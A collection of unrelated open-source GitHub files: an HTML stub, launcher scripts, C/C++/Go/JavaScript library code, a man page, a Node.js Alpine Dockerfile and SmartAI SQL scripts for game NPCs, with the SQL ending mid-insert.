<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<title>WebControl_Enabled</title>
<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
<meta content="Visual Basic .NET 7.1" name="CODE_LANGUAGE">
<meta content="JavaScript" name="vs_defaultClientScript">
<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
<script LANGUAGE="JavaScript">
function ScriptTest()
{
var theform;
if (window.navigator.appName.toLowerCase().indexOf("netscape") > -1) {
theform = document.forms["Form1"];
}
else {
theform = document.Form1;
}
}
</script>
</HEAD>
<body>
<form id="Form1" method="post" runat="server">
</form>
</body>
</HTML>
| {
"pile_set_name": "Github"
} |
#!/bin/sh
# Hand off to the Clover RetroArch launcher with the Cannonball core,
# forwarding all command-line arguments (e.g. the content path) unchanged.
exec retroarch-clover km_cannonball "$@"
| {
"pile_set_name": "Github"
} |
<#
// ReSharper disable UnusedVariable
var methods =
new[]
{
new {Name = "Control", NoIdx = false, NoChr = false},
new {Name = "HighSurrogate", NoIdx = false, NoChr = false},
new {Name = "LowSurrogate", NoIdx = false, NoChr = false},
new {Name = "Digit", NoIdx = true, NoChr = false},
new {Name = "Letter", NoIdx = true, NoChr = false},
new {Name = "LetterOrDigit", NoIdx = true, NoChr = false},
new {Name = "Lower", NoIdx = true, NoChr = false},
new {Name = "Upper", NoIdx = true, NoChr = false},
new {Name = "Number", NoIdx = true, NoChr = false},
new {Name = "Punctuation", NoIdx = true, NoChr = false},
new {Name = "Separator", NoIdx = true, NoChr = false},
new {Name = "Surrogate", NoIdx = false, NoChr = false},
new {Name = "SurrogatePair", NoIdx = false, NoChr = true},
new {Name = "Symbol", NoIdx = true, NoChr = false},
new {Name = "WhiteSpace", NoIdx = true, NoChr = false}
};
#> | {
"pile_set_name": "Github"
} |
//
// Copyright (c) 2012 The ANGLE Project Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
//
#include "compiler/translator/timing/RestrictVertexShaderTiming.h"
// Reports an error for every sampler-typed symbol encountered in the AST:
// samplers are not allowed in vertex shaders.
void RestrictVertexShaderTiming::visitSymbol(TIntermSymbol* node)
{
    if (!IsSampler(node->getBasicType()))
        return;

    ++mNumErrors;
    mSink.message(EPrefixError, node->getLine(),
                  "Samplers are not permitted in vertex shaders");
}
| {
"pile_set_name": "Github"
} |
.\" Automatically generated by Pandoc 2.10
.\"
.TH "plegendre_d1" "1" "2020-04-07" "Fortran 95" "SHTOOLS 4.7"
.hy
.SH PLegendre_d1
.PP
Compute all the unnormalized Legendre polynomials and first derivatives.
.SH Usage
.PP
call PLegendre_d1 (\f[C]p\f[R], \f[C]dp\f[R], \f[C]lmax\f[R],
\f[C]z\f[R], \f[C]exitstatus\f[R])
.SH Parameters
.TP
\f[B]\f[CB]p\f[B]\f[R] : output, real(dp), dimension (\f[B]\f[CB]lmax\f[B]\f[R]+1)
An array of unnormalized Legendre polynomials up to degree
\f[C]lmax\f[R].
Degree \f[C]l\f[R] corresponds to array index \f[C]l\f[R]+1.
.TP
\f[B]\f[CB]dp\f[B]\f[R] : output, real(dp), dimension (\f[B]\f[CB]lmax\f[B]\f[R]+1)
An array of the first derivatives of the unnormalized Legendre
polynomials up to degree \f[C]lmax\f[R].
Degree \f[C]l\f[R] corresponds to array index \f[C]l\f[R]+1.
.TP
\f[B]\f[CB]lmax\f[B]\f[R] : input, integer
The maximum degree of the Legendre polynomials to be computed.
.TP
\f[B]\f[CB]z\f[B]\f[R] : input, real(dp)
The argument of the Legendre polynomial.
.TP
\f[B]\f[CB]exitstatus\f[B]\f[R] : output, optional, integer
If present, instead of executing a STOP when an error is encountered,
the variable exitstatus will be returned describing the error.
0 = No errors; 1 = Improper dimensions of input array; 2 = Improper
bounds for input variable; 3 = Error allocating memory; 4 = File IO
error.
.SH Description
.PP
\f[C]PLegendre_d1\f[R] will calculate all of the unnormalized Legendre
polynomials and first derivatives up to degree \f[C]lmax\f[R] for a
given argument.
These are calculated using a standard three-term recursion formula, and
the integral of the Legendre polynomials over the interval [-1, 1] is
\f[C]2/(2l+1)\f[R].
Note that the derivative of the Legendre polynomials is calculated with
respect to its argument \f[C]z\f[R], and not latitude or colatitude.
If \f[C]z=cos(theta)\f[R], where \f[C]theta\f[R] is the colatitude, then
it is only necessary to multiply \f[C]dp\f[R] by \f[C]-sin(theta)\f[R]
to obtain the derivative with respect to \f[C]theta\f[R].
.SH See also
.PP
plbar, plbar_d1, plmbar, plmbar_d1, plon, plon_d1, plmon, plmon_d1,
plschmidt, plschmidt_d1, plmschmidt, plmschmidt_d1, plegendre,
plegendrea, plegendrea_d1
| {
"pile_set_name": "Github"
} |
/**
 * Select2 Icelandic (is) translation.
 *
 * Registers the locale under $.fn.select2.locales['is'] and applies it to
 * the plugin defaults.
 */
(function ($) {
    "use strict";

    var locale = {
        formatNoMatches: function () {
            return "Ekkert fannst";
        },
        formatInputTooShort: function (input, min) {
            var n = min - input.length;
            return "Vinsamlegast skrifið " + n + " staf" + (n > 1 ? "i" : "") + " í viðbót";
        },
        formatInputTooLong: function (input, max) {
            var n = input.length - max;
            return "Vinsamlegast styttið texta um " + n + " staf" + (n > 1 ? "i" : "");
        },
        formatSelectionTooBig: function (limit) {
            return "Þú getur aðeins valið " + limit + " atriði";
        },
        formatLoadMore: function (pageNumber) {
            return "Sæki fleiri niðurstöður…";
        },
        formatSearching: function () {
            return "Leita…";
        }
    };

    $.fn.select2.locales['is'] = locale;
    $.extend($.fn.select2.defaults, locale);
})(jQuery);
| {
"pile_set_name": "Github"
} |
// Code generated by cmd/cgo -godefs; DO NOT EDIT.
// cgo -godefs defs_linux.go

package socket

// NOTE(review): generated file — hand-written comments will be lost if the
// file is regenerated with cgo -godefs.  The 32-bit field widths (uint32
// lengths, sizeofMsghdr = 0x1c) indicate a 32-bit Linux ABI variant.

// iovec mirrors C struct iovec: one scatter/gather I/O segment.
type iovec struct {
	Base *byte
	Len  uint32
}

// msghdr mirrors C struct msghdr as used by sendmsg/recvmsg.
type msghdr struct {
	Name       *byte
	Namelen    uint32
	Iov        *iovec
	Iovlen     uint32
	Control    *byte
	Controllen uint32
	Flags      int32
}

// mmsghdr mirrors C struct mmsghdr as used by sendmmsg/recvmmsg.
type mmsghdr struct {
	Hdr msghdr
	Len uint32
}

// cmsghdr mirrors C struct cmsghdr: an ancillary (control) message header.
type cmsghdr struct {
	Len   uint32
	Level int32
	Type  int32
}

// sockaddrInet mirrors C struct sockaddr_in (IPv4).
type sockaddrInet struct {
	Family uint16
	Port   uint16
	Addr   [4]byte /* in_addr */
	X__pad [8]uint8
}

// sockaddrInet6 mirrors C struct sockaddr_in6 (IPv6).
type sockaddrInet6 struct {
	Family   uint16
	Port     uint16
	Flowinfo uint32
	Addr     [16]byte /* in6_addr */
	Scope_id uint32
}

// Byte sizes of the C structures above, as reported by cgo.
const (
	sizeofIovec  = 0x8
	sizeofMsghdr = 0x1c

	sizeofCmsghdr = 0xc

	sizeofSockaddrInet  = 0x10
	sizeofSockaddrInet6 = 0x1c
)
| {
"pile_set_name": "Github"
} |
/* -----------------------------------------------------------------------------
Software License for The Fraunhofer FDK AAC Codec Library for Android
© Copyright 1995 - 2018 Fraunhofer-Gesellschaft zur Förderung der angewandten
Forschung e.V. All rights reserved.
1. INTRODUCTION
The Fraunhofer FDK AAC Codec Library for Android ("FDK AAC Codec") is software
that implements the MPEG Advanced Audio Coding ("AAC") encoding and decoding
scheme for digital audio. This FDK AAC Codec software is intended to be used on
a wide variety of Android devices.
AAC's HE-AAC and HE-AAC v2 versions are regarded as today's most efficient
general perceptual audio codecs. AAC-ELD is considered the best-performing
full-bandwidth communications codec by independent studies and is widely
deployed. AAC has been standardized by ISO and IEC as part of the MPEG
specifications.
Patent licenses for necessary patent claims for the FDK AAC Codec (including
those of Fraunhofer) may be obtained through Via Licensing
(www.vialicensing.com) or through the respective patent owners individually for
the purpose of encoding or decoding bit streams in products that are compliant
with the ISO/IEC MPEG audio standards. Please note that most manufacturers of
Android devices already license these patent claims through Via Licensing or
directly from the patent owners, and therefore FDK AAC Codec software may
already be covered under those patent licenses when it is used for those
licensed purposes only.
Commercially-licensed AAC software libraries, including floating-point versions
with enhanced sound quality, are also available from Fraunhofer. Users are
encouraged to check the Fraunhofer website for additional applications
information and documentation.
2. COPYRIGHT LICENSE
Redistribution and use in source and binary forms, with or without modification,
are permitted without payment of copyright license fees provided that you
satisfy the following conditions:
You must retain the complete text of this software license in redistributions of
the FDK AAC Codec or your modifications thereto in source code form.
You must retain the complete text of this software license in the documentation
and/or other materials provided with redistributions of the FDK AAC Codec or
your modifications thereto in binary form. You must make available free of
charge copies of the complete source code of the FDK AAC Codec and your
modifications thereto to recipients of copies in binary form.
The name of Fraunhofer may not be used to endorse or promote products derived
from this library without prior written permission.
You may not charge copyright license fees for anyone to use, copy or distribute
the FDK AAC Codec software or your modifications thereto.
Your modified versions of the FDK AAC Codec must carry prominent notices stating
that you changed the software and the date of any change. For modified versions
of the FDK AAC Codec, the term "Fraunhofer FDK AAC Codec Library for Android"
must be replaced by the term "Third-Party Modified Version of the Fraunhofer FDK
AAC Codec Library for Android."
3. NO PATENT LICENSE
NO EXPRESS OR IMPLIED LICENSES TO ANY PATENT CLAIMS, including without
limitation the patents of Fraunhofer, ARE GRANTED BY THIS SOFTWARE LICENSE.
Fraunhofer provides no warranty of patent non-infringement with respect to this
software.
You may use this FDK AAC Codec software or modifications thereto only for
purposes that are authorized by appropriate patent licenses.
4. DISCLAIMER
This FDK AAC Codec software is provided by Fraunhofer on behalf of the copyright
holders and contributors "AS IS" and WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES,
including but not limited to the implied warranties of merchantability and
fitness for a particular purpose. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
CONTRIBUTORS BE LIABLE for any direct, indirect, incidental, special, exemplary,
or consequential damages, including but not limited to procurement of substitute
goods or services; loss of use, data, or profits, or business interruption,
however caused and on any theory of liability, whether in contract, strict
liability, or tort (including negligence), arising in any way out of the use of
this software, even if advised of the possibility of such damage.
5. CONTACT INFORMATION
Fraunhofer Institute for Integrated Circuits IIS
Attention: Audio and Multimedia Departments - FDK AAC LL
Am Wolfsmantel 33
91058 Erlangen, Germany
www.iis.fraunhofer.de/amm
[email protected]
----------------------------------------------------------------------------- */
/******************* Library for basic calculation routines ********************
Author(s):
Description:
*******************************************************************************/
#if defined(__mips_dsp)

#ifndef FUNCTION_getScalefactor_DBL
#define FUNCTION_getScalefactor_DBL
/*!
 *
 * \brief Calculate max possible scale factor for input vector
 *
 * \param vector Pointer to input vector
 * \param len    Length of input vector
 *
 * \return Maximum scale factor
 *
 * This function can constitute a significant amount of computational
 * complexity - very much depending on the bitrate. Since it is a rather small
 * function, effective assembler optimization might be possible.
 *
 */
SCALE_INLINE
INT getScalefactor(const FIXP_DBL *vector, /*!< Pointer to input vector */
                   INT len)                /*!< Length of input vector */
{
  INT i;
  FIXP_DBL maxVal = FL2FX_DBL(0.0f);
  /* OR together the absolute values of all elements: the OR preserves the
     most significant set bit seen anywhere in the vector, which is all that
     is needed to determine the common headroom.  absq_s.w is the MIPS DSP
     saturating absolute value, so |0x80000000| cannot wrap. */
  for (i = len; i != 0; i--) {
    maxVal |= __builtin_mips_absq_s_w(*vector++);
  }
  /* Redundant sign bits = leading zeros minus the sign bit itself; clamp to
     zero for full-scale input where no headroom remains. */
  return fixMax((INT)0, (CntLeadingZeros(maxVal) - 1));
}
#endif

#endif /*__mips_dsp */
| {
"pile_set_name": "Github"
} |
var baseToString = require('./_baseToString'),
    castSlice = require('./_castSlice'),
    charsEndIndex = require('./_charsEndIndex'),
    stringToArray = require('./_stringToArray'),
    toString = require('./toString');

/** Matches trailing whitespace. */
var reTrimEnd = /\s+$/;

/**
 * Removes trailing whitespace or specified characters from `string`.
 *
 * @static
 * @memberOf _
 * @since 4.0.0
 * @category String
 * @param {string} [string=''] The string to trim.
 * @param {string} [chars=whitespace] The characters to trim.
 * @param- {Object} [guard] Enables use as an iteratee for methods like `_.map`.
 * @returns {string} Returns the trimmed string.
 * @example
 *
 * _.trimEnd(' abc ');
 * // => ' abc'
 *
 * _.trimEnd('-_-abc-_-', '_-');
 * // => '-_-abc'
 */
function trimEnd(string, chars, guard) {
  string = toString(string);
  if (!string) {
    return string;
  }
  // Default mode: strip trailing whitespace with a simple regexp.
  if (guard || chars === undefined) {
    return string.replace(reTrimEnd, '');
  }
  chars = baseToString(chars);
  if (!chars) {
    return string;
  }
  // Custom mode: drop trailing code points found in `chars`, operating on
  // symbol arrays so surrogate pairs survive intact.
  var strSymbols = stringToArray(string);
  var end = charsEndIndex(strSymbols, stringToArray(chars)) + 1;
  return castSlice(strSymbols, 0, end).join('');
}

module.exports = trimEnd;
| {
"pile_set_name": "Github"
} |
#pragma once
#include "il2cpp-config.h"
#ifndef _MSC_VER
# include <alloca.h>
#else
# include <malloc.h>
#endif
#include <stdint.h>
#include "mscorlib_System_Object2689449295.h"
// System.Collections.IEnumerator
struct IEnumerator_t1466026749;
#ifdef __clang__
#pragma clang diagnostic push
#pragma clang diagnostic ignored "-Winvalid-offsetof"
#pragma clang diagnostic ignored "-Wunused-variable"
#endif
// System.Security.Cryptography.X509Certificates.X509ChainElementEnumerator
// NOTE(review): IL2CPP-generated native mirror of the managed enumerator
// type; regenerating the IL2CPP output discards hand-written comments.
// The enumerator simply wraps an inner System.Collections.IEnumerator.
struct X509ChainElementEnumerator_t3304975821 : public Il2CppObject
{
public:
	// System.Collections.IEnumerator System.Security.Cryptography.X509Certificates.X509ChainElementEnumerator::enumerator
	Il2CppObject * ___enumerator_0;

public:
	// Field offset used by the IL2CPP runtime for reflection/marshalling.
	inline static int32_t get_offset_of_enumerator_0() { return static_cast<int32_t>(offsetof(X509ChainElementEnumerator_t3304975821, ___enumerator_0)); }
	inline Il2CppObject * get_enumerator_0() const { return ___enumerator_0; }
	inline Il2CppObject ** get_address_of_enumerator_0() { return &___enumerator_0; }
	// The write barrier keeps the garbage collector aware of the stored
	// managed reference.
	inline void set_enumerator_0(Il2CppObject * value)
	{
		___enumerator_0 = value;
		Il2CppCodeGenWriteBarrier(&___enumerator_0, value);
	}
};
#ifdef __clang__
#pragma clang diagnostic pop
#endif
| {
"pile_set_name": "Github"
} |
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
////////////////////////////////////////////////////////////////////
//
// Defines a class for holding several meta data of the program
//
/////////////////////////////////////////////////////////////////////
#include "basics/execmeta.h"
#include <string>
namespace heron {
namespace common {

// Accessors for ExecutableMetadata.  Every setter stores a copy of its
// argument and returns *this so that calls can be chained while the
// process metadata is populated at startup.

// Program identity: executable name (argv[0]), instance id, and package.
const std::string& ExecutableMetadata::name() const { return name_; }
ExecutableMetadata& ExecutableMetadata::setName(const char* argv0) {
  name_ = std::string(argv0);
  return *this;
}
const std::string& ExecutableMetadata::instance() const { return instance_; }
ExecutableMetadata& ExecutableMetadata::setInstance(const char* instance) {
  instance_ = std::string(instance);
  return *this;
}
const std::string& ExecutableMetadata::package() const { return package_; }
ExecutableMetadata& ExecutableMetadata::setPackage(const char* package) {
  package_ = std::string(package);
  return *this;
}
// Version information: full version string plus major/minor/patch parts
// (stored as strings, not parsed integers).
const std::string& ExecutableMetadata::version() const { return version_; }
ExecutableMetadata& ExecutableMetadata::setVersion(const char* version) {
  version_ = std::string(version);
  return *this;
}
const std::string& ExecutableMetadata::majorVersion() const { return major_; }
ExecutableMetadata& ExecutableMetadata::setMajorVersion(const char* major) {
  major_ = std::string(major);
  return *this;
}
const std::string& ExecutableMetadata::minorVersion() const { return minor_; }
ExecutableMetadata& ExecutableMetadata::setMinorVersion(const char* minor) {
  minor_ = std::string(minor);
  return *this;
}
const std::string& ExecutableMetadata::patchNumber() const { return patch_; }
ExecutableMetadata& ExecutableMetadata::setPatchNumber(const char* patch) {
  patch_ = std::string(patch);
  return *this;
}
// Build provenance: who built the binary, where, and when.
const std::string& ExecutableMetadata::compileUser() const { return compile_user_; }
ExecutableMetadata& ExecutableMetadata::setCompileUser(const char* user) {
  compile_user_ = std::string(user);
  return *this;
}
const std::string& ExecutableMetadata::compileHost() const { return compile_host_; }
ExecutableMetadata& ExecutableMetadata::setCompileHost(const char* host) {
  compile_host_ = std::string(host);
  return *this;
}
const std::string& ExecutableMetadata::compileTime() const { return compile_time_; }
ExecutableMetadata& ExecutableMetadata::setCompileTime(const char* time) {
  compile_time_ = std::string(time);
  return *this;
}
// Source revision the binary was built from.
const std::string& ExecutableMetadata::gitSha() const { return git_sha_; }
ExecutableMetadata& ExecutableMetadata::setGitSha(const char* git_sha) {
  git_sha_ = std::string(git_sha);
  return *this;
}
const std::string& ExecutableMetadata::gitBranch() const { return git_branch_; }
ExecutableMetadata& ExecutableMetadata::setGitBranch(const char* git_branch) {
  git_branch_ = std::string(git_branch);
  return *this;
}
// Process start time (the only non-string field besides unit_test_).
const std::time_t& ExecutableMetadata::startTime() const { return start_time_; }
ExecutableMetadata& ExecutableMetadata::setStartTime(const std::time_t& time) {
  start_time_ = time;
  return *this;
}
// Logging configuration: file-name prefix and target directory.
const std::string& ExecutableMetadata::logPrefix() const { return log_prefix_; }
ExecutableMetadata& ExecutableMetadata::setLogPrefix(const char* log_prefix) {
  log_prefix_ = std::string(log_prefix);
  return *this;
}
const std::string& ExecutableMetadata::logDirectory() const { return log_directory_; }
ExecutableMetadata& ExecutableMetadata::setLogDirectory(const char* log_directory) {
  log_directory_ = std::string(log_directory);
  return *this;
}
// Whether the process is running as part of a unit test.
bool ExecutableMetadata::unitTest() const { return unit_test_; }
ExecutableMetadata& ExecutableMetadata::setUnitTest(const bool unit_test) {
  unit_test_ = unit_test;
  return *this;
}
} // namespace common
} // namespace heron
| {
"pile_set_name": "Github"
} |
# Node.js on Alpine Linux 3.10 (musl libc).
FROM alpine:3.10
# Node.js release to install.
ENV NODE_VERSION 10.22.1
# Create the unprivileged "node" user, then install Node: use the prebuilt
# musl binary when a checksum is known for this architecture, otherwise
# build from source (release tarball verified against the GPG-signed
# SHASUMS256.txt).
RUN addgroup -g 1000 node \
    && adduser -u 1000 -G node -s /bin/sh -D node \
    && apk add --no-cache \
        libstdc++ \
    && apk add --no-cache --virtual .build-deps \
        curl \
    && ARCH= && alpineArch="$(apk --print-arch)" \
      && case "${alpineArch##*-}" in \
        x86_64) \
          ARCH='x64' \
          CHECKSUM="72f0693db768ef07c712e7a575bd6914b8a74338e91e9e969c8d7e2a832d38f3" \
          ;; \
        *) ;; \
      esac \
  && if [ -n "${CHECKSUM}" ]; then \
    set -eu; \
    curl -fsSLO --compressed "https://unofficial-builds.nodejs.org/download/release/v$NODE_VERSION/node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz"; \
    echo "$CHECKSUM  node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" | sha256sum -c - \
      && tar -xJf "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" -C /usr/local --strip-components=1 --no-same-owner \
      && ln -s /usr/local/bin/node /usr/local/bin/nodejs; \
  else \
    echo "Building from source" \
    # backup build
    && apk add --no-cache --virtual .build-deps-full \
        binutils-gold \
        g++ \
        gcc \
        gnupg \
        libgcc \
        linux-headers \
        make \
        python \
    # gpg keys listed at https://github.com/nodejs/node#release-keys
    && for key in \
      4ED778F539E3634C779C87C6D7062848A1AB005C \
      94AE36675C464D64BAFA68DD7434390BDBE9B9C5 \
      71DCFD284A79C3B38668286BC97EC7A07EDE3FC1 \
      8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 \
      C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 \
      C82FA3AE1CBEDC6BE46B9360C43CEC45C17AB93C \
      DD8F2338BAE7501E3DD5AC78C273792F7D83545D \
      A48C2BEE680E841632CD4E44F07496B3EB3C1762 \
      108F52B48DB57BB0CC439B2997B01419BD92F80A \
      B9E2F5981AA6E0CD28160D9FF13993A75599653C \
    ; do \
      gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || \
      gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || \
      gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; \
    done \
    && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION.tar.xz" \
    && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/SHASUMS256.txt.asc" \
    && gpg --batch --decrypt --output SHASUMS256.txt SHASUMS256.txt.asc \
    && grep " node-v$NODE_VERSION.tar.xz\$" SHASUMS256.txt | sha256sum -c - \
    && tar -xf "node-v$NODE_VERSION.tar.xz" \
    && cd "node-v$NODE_VERSION" \
    && ./configure \
    && make -j$(getconf _NPROCESSORS_ONLN) V= \
    && make install \
    && apk del .build-deps-full \
    && cd .. \
    && rm -Rf "node-v$NODE_VERSION" \
    && rm "node-v$NODE_VERSION.tar.xz" SHASUMS256.txt.asc SHASUMS256.txt; \
  fi \
  && rm -f "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" \
  && apk del .build-deps \
  # smoke tests
  && node --version \
  && npm --version
# Yarn release to install.
ENV YARN_VERSION 1.22.4
# Install Yarn under /opt, verified against its release signing key.
RUN apk add --no-cache --virtual .build-deps-yarn curl gnupg tar \
  && for key in \
    6A010C5166006599AA17F08146C2130DFD2497F5 \
  ; do \
    gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || \
    gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || \
    gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; \
  done \
  && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" \
  && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" \
  && gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz \
  && mkdir -p /opt \
  && tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/ \
  && ln -s /opt/yarn-v$YARN_VERSION/bin/yarn /usr/local/bin/yarn \
  && ln -s /opt/yarn-v$YARN_VERSION/bin/yarnpkg /usr/local/bin/yarnpkg \
  && rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz \
  && apk del .build-deps-yarn \
  # smoke test
  && yarn --version
# The entrypoint script runs `node` by default and drops privileges where
# configured; CMD supplies the default program.
COPY docker-entrypoint.sh /usr/local/bin/
ENTRYPOINT ["docker-entrypoint.sh"]
CMD [ "node" ]
| {
"pile_set_name": "Github"
} |
/*
Package phpv contains all required types and interfaces for storing Goro
values, context, or compiled PHP code.
*/
package phpv
| {
"pile_set_name": "Github"
} |
-- SAI for Defias Messenger
SET @ENTRY := 550;
UPDATE `creature_template` SET `AIName`='SmartAI' WHERE `entry`=@ENTRY;
-- DELETE FROM `creature_ai_scripts` WHERE `creature_id`=@ENTRY;
DELETE FROM `smart_scripts` WHERE `source_type`=0 AND `entryorguid`=@ENTRY;
-- Row 0: event 4 (on aggro) -> action 1 (say creature_text group 0).
-- Row 1: event 2 (HP between 0-15%) -> action 25 (flee for assist).
INSERT INTO `smart_scripts` (`entryorguid`,`source_type`,`id`,`link`,`event_type`,`event_phase_mask`,`event_chance`,`event_flags`,`event_param1`,`event_param2`,`event_param3`,`event_param4`,`action_type`,`action_param1`,`action_param2`,`action_param3`,`action_param4`,`action_param5`,`action_param6`,`target_type`,`target_param1`,`target_param2`,`target_param3`,`target_x`,`target_y`,`target_z`,`target_o`,`comment`) VALUES
(@ENTRY,0,0,0,4,0,100,1,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0, 'Defias Messenger - On Aggro - Say Random text'),
(@ENTRY,0,1,0,2,0,100,1,0,15,0,0,25,1,0,0,0,0,0,1,0,0,0,0,0,0,0, 'Defias Messenger - HP@15% - Flee');
-- NPC talk text convert from creature_ai_text
-- DELETE FROM `creature_ai_texts` WHERE entry BETWEEN -211 AND -209;
DELETE FROM `creature_text` WHERE `entry` IN (550);
-- Three variants in group 0; one is picked at random on aggro.
INSERT INTO `creature_text` (`entry`,`groupid`,`id`,`text`,`type`,`language`,`probability`,`emote`,`duration`,`sound`,`comment`) VALUES
(550,0,0, 'I have a special message for $N. And it says you must die!',12,0,100,0,0,0, 'Defias Messenger - Aggro Random Say'),
(550,0,1, 'I''ll deliver you, weak $C, to the afterlife!',12,0,100,0,0,0, 'Defias Messenger - Aggro Random Say'),
(550,0,2, 'Die in the name of Edwin van Cleef!',12,0,100,0,0,0, 'Defias Messenger - Aggro Random Say');
-- SAI for Cursed Sailor
SET @ENTRY := 1157;
UPDATE `creature_template` SET `AIName`='SmartAI' WHERE `entry`=@ENTRY;
-- DELETE FROM `creature_ai_scripts` WHERE `creature_id`=@ENTRY;
DELETE FROM `smart_scripts` WHERE `source_type`=0 AND `entryorguid`=@ENTRY;
-- 20% chance to talk on aggro.
INSERT INTO `smart_scripts` (`entryorguid`,`source_type`,`id`,`link`,`event_type`,`event_phase_mask`,`event_chance`,`event_flags`,`event_param1`,`event_param2`,`event_param3`,`event_param4`,`action_type`,`action_param1`,`action_param2`,`action_param3`,`action_param4`,`action_param5`,`action_param6`,`target_type`,`target_param1`,`target_param2`,`target_param3`,`target_x`,`target_y`,`target_z`,`target_o`,`comment`) VALUES
(@ENTRY,0,0,0,4,0,20,1,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0, 'Cursed Sailor - On Aggro - Say Random text');
-- SAI for Cursed Marine
SET @ENTRY := 1158;
UPDATE `creature_template` SET `AIName`='SmartAI' WHERE `entry`=@ENTRY;
-- DELETE FROM `creature_ai_scripts` WHERE `creature_id`=@ENTRY;
DELETE FROM `smart_scripts` WHERE `source_type`=0 AND `entryorguid`=@ENTRY;
-- Rows 1+2 are linked (event 61): cast Curse of the Eye 10651, then 3360, on victim.
INSERT INTO `smart_scripts` (`entryorguid`,`source_type`,`id`,`link`,`event_type`,`event_phase_mask`,`event_chance`,`event_flags`,`event_param1`,`event_param2`,`event_param3`,`event_param4`,`action_type`,`action_param1`,`action_param2`,`action_param3`,`action_param4`,`action_param5`,`action_param6`,`target_type`,`target_param1`,`target_param2`,`target_param3`,`target_x`,`target_y`,`target_z`,`target_o`,`comment`) VALUES
(@ENTRY,0,0,0,4,0,20,1,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0, 'Cursed Marine - On Aggro - Say Random text'),
(@ENTRY,0,1,2,0,0,100,0,4200,19600,27500,57700,11,10651,32,0,0,0,0,2,0,0,0,0,0,0,0, 'Cursed Marine - Combat - Cast Curse of the Eye'),
(@ENTRY,0,2,0,61,0,100,0,0,0,0,0,11,3360,32,0,0,0,0,2,0,0,0,0,0,0,0, 'Cursed Marine - Combat - Cast Curse of the Eye');
-- SAI for Captain Halyndor
SET @ENTRY := 1160;
UPDATE `creature_template` SET `AIName`='SmartAI' WHERE `entry`=@ENTRY;
-- DELETE FROM `creature_ai_scripts` WHERE `creature_id`=@ENTRY;
DELETE FROM `smart_scripts` WHERE `source_type`=0 AND `entryorguid`=@ENTRY;
-- Fix: rows 1 and 2 previously carried 'Cursed Marine' comments copy-pasted
-- from entry 1158; corrected to name this creature (Captain Halyndor).
INSERT INTO `smart_scripts` (`entryorguid`,`source_type`,`id`,`link`,`event_type`,`event_phase_mask`,`event_chance`,`event_flags`,`event_param1`,`event_param2`,`event_param3`,`event_param4`,`action_type`,`action_param1`,`action_param2`,`action_param3`,`action_param4`,`action_param5`,`action_param6`,`target_type`,`target_param1`,`target_param2`,`target_param3`,`target_x`,`target_y`,`target_z`,`target_o`,`comment`) VALUES
(@ENTRY,0,0,0,4,0,20,1,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0, 'Captain Halyndor - On Aggro - Say Random text'),
(@ENTRY,0,1,2,0,0,100,0,3600,4800,11000,23300,11,10651,32,0,0,0,0,4,0,0,0,0,0,0,0, 'Captain Halyndor - Combat - Cast Curse of the Eye'),
(@ENTRY,0,2,0,61,0,100,0,0,0,0,0,11,3360,32,0,0,0,0,4,0,0,0,0,0,0,0, 'Captain Halyndor - Combat - Cast Curse of the Eye'),
(@ENTRY,0,3,0,0,0,100,0,7300,8300,11000,26400,11,3389,0,0,0,0,0,2,0,0,0,0,0,0,0, 'Captain Halyndor - Combat - Cast Ward of the Eye');
-- NPC talk text convert from creature_ai_text
-- DELETE FROM `creature_ai_texts` WHERE `entry` IN (-42,-103,-161);
DELETE FROM `creature_text` WHERE `entry` IN (1157,1158,1160);
-- $C / $R / $N are chat placeholders expanded at runtime (class / race / name).
INSERT INTO `creature_text` (`entry`,`groupid`,`id`,`text`,`type`,`language`,`probability`,`emote`,`duration`,`sound`,`comment`) VALUES
(1157,0,0, 'Time to join us, $C.',12,0,100,0,0,0, 'Cursed Sailor - Aggro Random Say'),
(1157,0,1, 'Brains...',12,0,100,0,0,0, 'Cursed Sailor - Aggro Random Say'),
